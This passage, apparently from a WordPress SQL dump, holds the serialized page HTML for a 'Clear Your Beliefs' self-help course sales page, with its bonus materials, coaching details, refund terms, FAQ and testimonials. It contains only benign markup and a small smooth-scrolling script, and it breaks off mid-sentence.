href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1972, 2234, '_wp_page_template', 'page-templates/full-width.php'),
(1971, 2234, '_edit_last', '2'),
(1960, 2233, '_wp_page_template', 'page-templates/full-width.php'),
(1959, 2233, '_edit_last', '2');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1961, 2233, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72841:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></center></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your 